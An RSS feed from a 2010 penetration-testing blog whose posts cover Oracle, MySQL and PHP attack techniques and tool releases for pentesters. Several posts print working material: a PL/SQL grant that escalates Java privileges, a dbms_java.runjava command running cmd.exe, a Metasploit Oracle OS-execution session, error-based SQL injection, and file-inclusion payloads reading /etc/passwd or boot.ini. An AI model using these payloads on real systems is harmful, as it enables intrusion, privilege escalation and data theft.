<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>www.notsosecure.com</title>
	<atom:link href="http://www.notsosecure.com/folder2/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.notsosecure.com/folder2</link>
	<description>From Pentesters To Pentesters</description>
	<lastBuildDate>Thu, 01 Jul 2010 10:08:34 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>bsqlbf v 2.6</title>
		<link>http://www.notsosecure.com/folder2/2010/07/01/bsqlbf-v-2-6/</link>
		<comments>http://www.notsosecure.com/folder2/2010/07/01/bsqlbf-v-2-6/#comments</comments>
		<pubDate>Thu, 01 Jul 2010 10:08:34 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=382</guid>
		<description><![CDATA[The new version of bsqlbf is now available for download. The new addition is the execution of any metasploit payload after executing OS code against Oracle database server by exploiting SQL Injection from web apps.
Project Homepage
Video
]]></description>
			<content:encoded><![CDATA[<p>The new version of bsqlbf is now available for download. The new addition is the execution of any metasploit payload after executing OS code against Oracle database server by exploiting SQL Injection from web apps.</p>
<p><a href="http://code.google.com/p/bsqlbf-v2/">Project Homepage</a></p>
<p><a href="http://www.youtube.com/watch?v=txVDy1yhKoA">Video</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/07/01/bsqlbf-v-2-6/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>mysql exploitation with error messages</title>
		<link>http://www.notsosecure.com/folder2/2010/06/29/mysql-exploitation-with-error-messages/</link>
		<comments>http://www.notsosecure.com/folder2/2010/06/29/mysql-exploitation-with-error-messages/#comments</comments>
		<pubDate>Tue, 29 Jun 2010 11:04:46 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=380</guid>
		<description><![CDATA[A colleague of mine(Aleks) forwarded me a russian presentation on exploiting SQL Injection:
http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html
Of all the slides, i particular liked the one in which the author demonstrates that if the mysql error messages have been enabled (using mysql_error() function), then it is possible to retrieve the data from the back-end database using the ExtractValue() function:
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;
>SELECT 1 [...]]]></description>
			<content:encoded><![CDATA[<p>A colleague of mine(Aleks) forwarded me a russian presentation on exploiting SQL Injection:</p>
<p><a href="http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html">http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html</a></p>
<p>Of all the slides, i particular liked the one in which the author demonstrates that if the mysql error messages have been enabled (using mysql_error() function), then it is possible to retrieve the data from the back-end database using the ExtractValue() function:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
>SELECT 1 AND ExtractValue(1, CONCAT(0&#215;5c, (SELECT @@VERSION)))</p>
<p>produces:</p>
<p>Error Code : 1105<br />
XPATH syntax error: <strong>&#8216;\5.1.44-community&#8217;</strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
This should not be confused with the php errors. While the php errors are usually enabled its not &#8220;very&#8221; common to see developers printing the mysql errors using mysql_error() function. However, its still good to know and could sometimes come handy.</p>
<p>Overall, very nice presentation.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/06/29/mysql-exploitation-with-error-messages/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Blackhat, Defcon 2010</title>
		<link>http://www.notsosecure.com/folder2/2010/06/25/blackhat-defcon-2010/</link>
		<comments>http://www.notsosecure.com/folder2/2010/06/25/blackhat-defcon-2010/#comments</comments>
		<pubDate>Fri, 25 Jun 2010 08:16:59 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=376</guid>
		<description><![CDATA[This year, i will be talking at Blackhat and Defcon. The talk is titled &#8220;Hacking Oracle From Web Apps&#8221;. The details about the talk can be found here. I am also releasing a small teaser video of the new bsqlbf version which i will be releasing soon.  See you in Vegas!

Link to the video
]]></description>
			<content:encoded><![CDATA[<p>This year, i will be talking at Blackhat and Defcon. The talk is titled &#8220;Hacking Oracle From Web Apps&#8221;. The details about the talk can be found <a href="http://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Siddharth">here</a>. I am also releasing a small teaser video of the new bsqlbf version which i will be releasing soon.  See you in Vegas!</p>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/txVDy1yhKoA&#038;hl=en&#038;fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/txVDy1yhKoA&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
<p><a href="http://www.youtube.com/v/txVDy1yhKoA">Link to the video</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/06/25/blackhat-defcon-2010/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Infosec 2010</title>
		<link>http://www.notsosecure.com/folder2/2010/04/22/infosec-2010/</link>
		<comments>http://www.notsosecure.com/folder2/2010/04/22/infosec-2010/#comments</comments>
		<pubDate>Thu, 22 Apr 2010 11:15:14 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=372</guid>
		<description><![CDATA[Its that time of the year. If you are attending Infosec 2010 in London, it will be a good time to meet up. I will at stand G42. I will also be giving a talk titled:
Latest From the world of Hacking
The talk shows a number of recently released exploits in action. These include:
* Oracle 10g/11g [...]]]></description>
			<content:encoded><![CDATA[<p>Its that time of the year. If you are attending <a href="http://www.infosec.co.uk/">Infosec 2010</a> in London, it will be a good time to meet up. I will at stand <strong>G42</strong>. I will also be giving a talk titled:<br />
<strong>Latest From the world of Hacking</strong></p>
<p>The talk shows a number of recently released exploits <strong>in action</strong>. These include:<br />
* Oracle 10g/11g DBMS_JVM_EXP_PERMS exploit<br />
* ie aurora exploit<br />
* KiTrap0D exploit (windows local privilege escalation)<br />
* Java Web Start client side exploit<br />
* Remote Code execution in SMB v2 (MS09-050)<br />
* Linux Kernel 2.x sock_sendpage() Local Ring0 root exploit<br />
* Some PDF exploits<br />
&#8230;and many more&#8230;</p>
<p>See you there!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/04/22/infosec-2010/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>bsqlbf v2.5</title>
		<link>http://www.notsosecure.com/folder2/2010/04/13/bsqlbf-v2-5/</link>
		<comments>http://www.notsosecure.com/folder2/2010/04/13/bsqlbf-v2-5/#comments</comments>
		<pubDate>Tue, 13 Apr 2010 18:32:03 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=369</guid>
		<description><![CDATA[I have updated bsqlbf and the latest version (2.5), has the following 2 additions:
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), with DBA Privs (11g R1 and R2)
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions (10g R2, 11g R1 and R2) 
For more details about these 2 attack vectors, please refer to the [...]]]></description>
			<content:encoded><![CDATA[<p>I have updated bsqlbf and the latest version (2.5), has the following 2 additions:</p>
<p><strong>Type 7:</strong> is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), with DBA Privs (11g R1 and R2)<br />
<strong>Type 8</strong>: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions (10g R2, 11g R1 and R2) </p>
<p>For more details about these 2 attack vectors, please refer to the paper, <a href="http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf">Hacking Oracle From Web</a></p>
<p><a href="http://code.google.com/p/bsqlbf-v2/">Bsqlbf Homepage</a></p>
<p>Enjoy!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/04/13/bsqlbf-v2-5/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Metasploit Oracle Windows</title>
		<link>http://www.notsosecure.com/folder2/2010/03/15/metasploit-oracle-windows/</link>
		<comments>http://www.notsosecure.com/folder2/2010/03/15/metasploit-oracle-windows/#comments</comments>
		<pubDate>Mon, 15 Mar 2010 17:38:37 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=366</guid>
		<description><![CDATA[I finally managed to get Oracle and Metasploit working (only in windows though). Here are the steps that i followed (thanks to bugtrace):
[1]Install subversion client
http://www.open.collab.net/files/documents/60/3006/CollabNetSubversion-client-1.6.9-1.win32.exe
[2]install ruby
http://rubyforge.org/frs/download.php/47082/ruby186-27_rc2.exe
[3]install ruby-oci8
wget http://rubyforge.org/frs/download.php/65901/ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb
[4]
svn co http://metasploit.com/svn/framework3/trunk/ metasploit
cd metasploit
ruby msfconsole
&#8212;&#8212;-
As i was very pleased to see the oracle exploits in action in Metasploit, i have also added 2 new exploits from [...]]]></description>
			<content:encoded><![CDATA[<p>I finally managed to get Oracle and Metasploit working (only in windows though). Here are the steps that i followed (thanks to bugtrace):<br />
[1]Install subversion client<br />
http://www.open.collab.net/files/documents/60/3006/CollabNetSubversion-client-1.6.9-1.win32.exe</p>
<p>[2]install ruby<br />
http://rubyforge.org/frs/download.php/47082/ruby186-27_rc2.exe</p>
<p>[3]install ruby-oci8<br />
wget http://rubyforge.org/frs/download.php/65901/ruby-oci8-1.0.7-mswin32.rb<br />
ruby ruby-oci8-1.0.7-mswin32.rb</p>
<p>[4]<br />
svn co http://metasploit.com/svn/framework3/trunk/ metasploit</p>
<p>cd metasploit<br />
ruby msfconsole</p>
<p>&#8212;&#8212;-<br />
As i was very pleased to see the oracle exploits in action in Metasploit, i have also added <strong>2 new exploits</strong> from David Litchfield&#8217;s blackhat talk (DBMS_JVM_EXP_PERMS exploit). The exploits let you execute OS Code against 10g R2, 11g R1 and 11g R2 if you have a valid user account (just create session privileged required). Please do a svn update to get the following new files:</p>
<p>modules\auxiliary\sqli\oracle\jvm_os_code_10g.rb<br />
modules\auxiliary\sqli\oracle\jvm_os_code_11g.rb</p>
<p>Here is how it works:</p>
<p>C:\metasploit>svn update</p>
<p><strong>A    modules\auxiliary\sqli\oracle\jvm_os_code_10g.rb<br />
A    modules\auxiliary\sqli\oracle\jvm_os_code_11g.rb</strong><br />
U    modules\auxiliary\scanner\nfs\nfsmount.rb<br />
A    modules\auxiliary\scanner\smb\smb_enumshares.rb<br />
U    modules\auxiliary\gather\dns_enum.rb<br />
U    modules\exploits\unix\webapp\phpbb_highlight.rb<br />
U    data\wordlists\namelist.txt<br />
A    data\sql\migrate\014_add_loots_fields.rb</p>
<p>msf auxiliary(jvm_os_code_10g) > use auxiliary/sqli/oracle/jvm_os_code_10g<br />
msf auxiliary(jvm_os_code_10g) > info</p>
<p>     Name:  DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution<br />
    Version: 8822<br />
    License: Metasploit Framework License (BSD)<br />
     Rank: Normal</p>
<p>Provided by:<br />
  sid <sid@notsosecure.com></p>
<p>Basic options:<br />
  Name    Current Setting                                    Required  Description<br />
  &#8212;-    &#8212;&#8212;&#8212;&#8212;&#8212;                                    &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
  CMD     echo metasploit >> %SYSTEMDRIVE%\\unbreakable.txt  no        CMD to execute.<br />
  DBPASS  test                                               yes       The password to authenticate with.<br />
  DBUSER  test                                              yes       The username to authenticate with.<br />
  RHOST   192.168.2.11                                   yes       The Oracle host.<br />
  RPORT   1521                                              yes       The TNS port.<br />
  SID     ORCLX                                              yes       The sid to authenticate with.</p>
<p>Description:<br />
  This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package<br />
  that allows any user with create session privilege to grant<br />
  themselves java IO privileges. Identified by David Litchfield. Works<br />
  on 10g R2, 11g R1 and R2 (Windows only)</p>
<p>References:<br />
  http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield<br />
  http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/</p>
<p>msf auxiliary(jvm_os_code_10g) > set RHOST 192.168.2.11<br />
RHOST => 192.168.2.11<br />
msf auxiliary(jvm_os_code_10g) > set RPORT 1521<br />
RPORT => 1521<br />
msf auxiliary(jvm_os_code_10g) > set DBUSER test<br />
DBUSER => test<br />
msf auxiliary(jvm_os_code_10g) > set DBPASS test<br />
DBPASS => test<br />
msf auxiliary(jvm_os_code_10g) > set SID ORCLX<br />
SID => ORCLX<br />
msf auxiliary(jvm_os_code_10g) > run</p>
<p>[*] Attempting to grant JAVA IO Privileges<br />
[*] Attempting to execute OS Code<br />
[*] Auxiliary module execution completed<br />
msf auxiliary(jvm_os_code_10g) ></p>
<p>Enjoy!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/03/15/metasploit-oracle-windows/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Hacking Oracle 11g</title>
		<link>http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/</link>
		<comments>http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 20:37:40 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=361</guid>
		<description><![CDATA[David Litchfield&#8217;s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:
Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT &#8216;GRANT&#8217;,USER(), &#8216;SYS&#8217;,'java.io.FilePermission&#8217;,&#8217;&#8216;,&#8217;execute&#8217;,'ENABLED&#8217; from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT [...]]]></description>
			<content:encoded><![CDATA[<p>David Litchfield&#8217;s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:</p>
<p>Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.</p>
<blockquote><p>DECLARE<br />
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;<br />
CURSOR C1 IS SELECT &#8216;GRANT&#8217;,USER(), &#8216;SYS&#8217;,'java.io.FilePermission&#8217;,&#8217;<&lt;ALL FILES&gt;>&#8216;,&#8217;execute&#8217;,'ENABLED&#8217; from dual;<br />
BEGIN<br />
OPEN C1;<br />
FETCH C1 BULK COLLECT INTO POL;<br />
CLOSE C1;<br />
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);<br />
END;<br />
/</p></blockquote>
<p>Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).</p>
<p>However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:</p>
<blockquote><p>select dbms_java.runjava(&#8217;oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst&#8217;)from dual;</p></blockquote>
<p>Here is the link of the talk video:<br />
<a href="https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov">https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Local File Inclusion with Magic_quotes_gpc enabled</title>
		<link>http://www.notsosecure.com/folder2/2010/02/02/local-file-inclusion-with-magic_quotes_gpc-enabled/</link>
		<comments>http://www.notsosecure.com/folder2/2010/02/02/local-file-inclusion-with-magic_quotes_gpc-enabled/#comments</comments>
		<pubDate>Tue, 02 Feb 2010 09:29:29 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=347</guid>
		<description><![CDATA[So, lets look at a piece of code:
&#60;?php include(&#8217;inc/&#8217;.$_GET['page'].&#8217;php&#8217;); ?&#62;

Normally, you would use the null byte (%00) to exploit it:
vuln.php?page=../../../../../etc/passwd%00
but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.
How to bypass this: it you add a large number of dots (&#8230;..) than the null byte [...]]]></description>
			<content:encoded><![CDATA[<p>So, lets look at a piece of code:</p>
<blockquote><p>&lt;?php include(&#8217;inc/&#8217;.$_GET['page'].&#8217;php&#8217;); ?&gt;
</p></blockquote>
<p>Normally, you would use the null byte (%00) to exploit it:</p>
<blockquote><p>vuln.php?page=../../../../../etc/passwd%00</p></blockquote>
<p>but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.</p>
<p><strong>How to bypass this</strong>: it you add a large number of dots (&#8230;..) than the <del datetime="2010-02-02T12:33:52+00:00">null byte will not get escaped</del> null byte is not required. e.g.</p>
<blockquote><p>vuln.php?<del datetime="2010-02-02T12:33:52+00:00">page=../../../../../etc/passwd%00&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..(200 dots in this case)</del></p></blockquote>
<blockquote><p>vuln.php?page=../../../../../etc/passwd&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..(200 dots in this case)</p></blockquote>
<p><strong>Correction:</strong> You don&#8217;t need null byte here.</p>
<p><strong>Update:</strong> As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link</p>
<p>tested on php version: 5.2.12 (wamp environment)</p>
<p>References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar</p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/02/02/local-file-inclusion-with-magic_quotes_gpc-enabled/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Open Redirection</title>
		<link>http://www.notsosecure.com/folder2/2010/01/22/open-redirection/</link>
		<comments>http://www.notsosecure.com/folder2/2010/01/22/open-redirection/#comments</comments>
		<pubDate>Fri, 22 Jan 2010 15:13:07 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=329</guid>
		<description><![CDATA[So, recently i encountered an application which was really secure against XSS.

image link
How many issues can one parameter suffer from:
1. Open redirection
2. Session ID in the URL
3. Session Hijacking by combining 1 and 2
Oh but, really safe against XSS!  
]]></description>
			<content:encoded><![CDATA[<p>So, recently i encountered an application which was really secure against XSS.</p>
<p><img src="http://www.notsosecure.com/folder2/wp-content/uploads/2010/01/who_needs_xss1.PNG" alt="who_needs_xss" title="who_needs_xss" width="600" height="500" class="alignleft size-full wp-image-335" /></p>
<p>image <a href="http://www.notsosecure.com/folder2/wp-content/uploads/2010/01/who_needs_xss1.PNG">link</a><br />
How many issues can one parameter suffer from:</p>
<p>1. Open redirection<br />
2. Session ID in the URL<br />
3. Session Hijacking by combining 1 and 2</p>
<p>Oh but, really safe against XSS! <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/01/22/open-redirection/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Twitter</title>
		<link>http://www.notsosecure.com/folder2/2009/12/30/twitter/</link>
		<comments>http://www.notsosecure.com/folder2/2009/12/30/twitter/#comments</comments>
		<pubDate>Wed, 30 Dec 2009 11:46:36 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/2009/12/30/twitter/</guid>
		<description><![CDATA[I have finally decided to give twitter a go. 
Follow me at:
https://twitter.com/notsosecure
]]></description>
			<content:encoded><![CDATA[<p>I have finally decided to give twitter a go. <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
Follow me at:<br />
<a href="https://twitter.com/notsosecure">https://twitter.com/notsosecure</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/12/30/twitter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
